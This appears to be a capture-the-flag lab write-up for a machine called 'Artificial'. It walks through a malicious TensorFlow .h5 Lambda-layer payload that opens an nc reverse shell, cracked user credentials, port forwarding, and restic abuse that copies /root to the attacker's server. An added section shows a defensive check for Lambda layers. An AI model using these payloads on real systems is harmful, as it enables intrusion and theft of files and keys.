# Artificial

## 0x1 Recon
### Rustscan
### Nmap
### Website
### Dirsearch
## 0x2 Tensorflow RCE
* The site looks like an AI model hosting service, with a login page and a register page
* When I try to register as `admin`, the system says this username already exists
* Logging in as the user `123` we created shows an upload page that accepts `.h5` files
:::info
HDF5 is a version of the HDF (Hierarchical Data Format) file format, designed to store and organize large amounts of data.
:::
* I generate a reverse shell with `msfvenom`, name it `rev.h5`, and upload it to the website
* Clicking the `View Predictions` button leads to `run_model`, but I do not receive a shell
* Download the two files from the website
* The machine uses a library called `tensorflow-cpu`
:::info
`tensorflow` needs a Python 3.6-3.9 environment
:::
* Install `uv` and download Python 3.8; `uv venv` creates a virtual environment
* https://github.com/astral-sh/uv
```bash=
curl -LsSf https://astral.sh/uv/install.sh | sh
uv python install 3.8
uv venv --python 3.8
source .venv/bin/activate.fish
```
* Following this article, I build the Docker environment with a Dockerfile
* https://splint.gitbook.io/cyberblog/security-research/tensorflow-remote-code-execution-with-malicious-model#getting-the-rce
```bash=
# build the image from the Dockerfile, then run the same tag
sudo docker build -t artifical .
sudo docker run -it artifical
```
* Then create the reverse shell deserialization payload with this Python code
```python=
import tensorflow as tf

# The Lambda layer's Python function is serialized into the .h5 file and
# executed when the model is loaded on the server, so it carries the payload
def exploit(x):
    import os
    os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")
```
* Upload the malicious file and click the `View Predictions` button; this time I get a shell as `app`
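Added here as a defender-side check, not part of the original writeup: before an upload handler hands an `.h5` file to `load_model`, read its `model_config` and refuse any model containing a `Lambda` layer, which is exactly where the payload above lives. It assumes the Keras 2 / TF 2.x HDF5 layout (a root `model_config` JSON attribute with the Lambda body stored under `function`); `h5py` is only needed for the file reader.

```python
import json

# Layer classes whose config embeds serialized Python (marshalled bytecode) that
# Keras 2 / TF 2.x unmarshals and runs at load time. Assumption: this mirrors the
# Keras 2 HDF5 "model_config" layout; it is an added check, not the writeup's code.
CODE_CARRYING_LAYERS = {"Lambda"}

def find_code_layers(model_config):
    """Return every layer in a model_config (dict or JSON string) that carries
    serialized Python. Nested Sequential/Functional models are descended into."""
    if isinstance(model_config, str):
        model_config = json.loads(model_config)
    findings = []
    _walk(model_config, [], findings)
    return findings

def _walk(node, path, findings):
    if not isinstance(node, dict):
        return
    cfg = node.get("config")
    cfg = cfg if isinstance(cfg, dict) else {}
    name = str(cfg.get("name", "?"))
    if node.get("class_name") in CODE_CARRYING_LAYERS:
        func = cfg.get("function")
        # Keras stores a Lambda body as [base64(marshal(code)), defaults, closure]
        has_bytecode = isinstance(func, list) and len(func) > 0 and isinstance(func[0], str)
        findings.append({"path": "/".join(path + [name]),
                         "class": node["class_name"], "bytecode": has_bytecode})
    for layer in cfg.get("layers", []):  # sub-models keep their layers here
        _walk(layer, path + [name], findings)

def is_safe_to_load(model_config):
    """Gate to run before tf.keras.models.load_model(): refuse any model whose
    config would execute embedded code on load."""
    return not find_code_layers(model_config)

def scan_h5(path):
    """Read the root 'model_config' attribute of an HDF5 model without loading it
    (h5py is imported lazily so the JSON checks above run without it)."""
    import h5py
    with h5py.File(path, "r") as f:
        raw = f.attrs["model_config"]
    return find_code_layers(raw.decode() if isinstance(raw, bytes) else raw)

# Constructed sample of what model.save("exploit.h5") writes for the Input -> Lambda
# model in the writeup (the base64 blob is a placeholder, not real bytecode).
MALICIOUS_SAMPLE = json.dumps({"class_name": "Sequential", "config": {"name": "sequential", "layers": [
    {"class_name": "InputLayer", "config": {"name": "input_1", "batch_input_shape": [None, 64]}},
    {"class_name": "Lambda", "config": {"name": "lambda", "function_type": "lambda",
                                        "function": ["<placeholder-b64>", None, None]}}]}})
```

Rejecting at the config level is cheaper and safer than loading in a sandbox, since `load_model` already executes the embedded code before any layer is run.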
## 0x3 Shell as gael
* There are some credentials in `/instance`
* Use `hashcat` to crack `gael`'s hash and recover his password
* `gael:mattp005numbertwo`
* Connect to the machine as `gael` via SSH
* Upload `linpeas` and run it
* This backup file is interesting, but it is just a plain tar file (not gzip-compressed), so only the `xvf` options are needed
```bash=
tar -xvf backrest_backup.tar.gz
```
* A password is stored in `config.json`
## 0x4 Shell as root
* It needs to be base64-decoded first; then I cracked the password
* `root:!@#$%^`
* But it is not root's password, so I turned to the open ports
* Forward port 9898
```bash=
# ss on the box shows the local-only listener; ssh -L brings it to the attacker side
ssh gael@10.10.11.74 -L 9898:127.0.0.1:9898
ss -tuln
```
* Log in to `Backrest` as `backrest_root`
* Create a repo
* This feature is built on the `restic` command, so I follow GTFOBins
* https://gtfobins.github.io/gtfobins/restic/
* First I run a restic REST server
* https://github.com/restic/rest-server/releases/tag/v0.14.0
```bash=
# listen on the port the repo URL below points at
./rest-server --path /tmp/restic-data --listen ":12345" --no-auth
```
* Then go back to `repo1` in Backrest and run the command below
```bash=
init -r rest:http://10.10.16.2:12345/myrepo
```
* Back up the `/root` folder
```bash=
-r rest:http://10.10.16.2:12345/myrepo backup /root
```
* Check and restore the snapshot
```bash=
restic -r /tmp/restic-data/myrepo snapshots
restic -r /tmp/restic-data/myrepo restore b5b6e87a --target ./restore
```
* And we get `root.txt` and `id_rsa`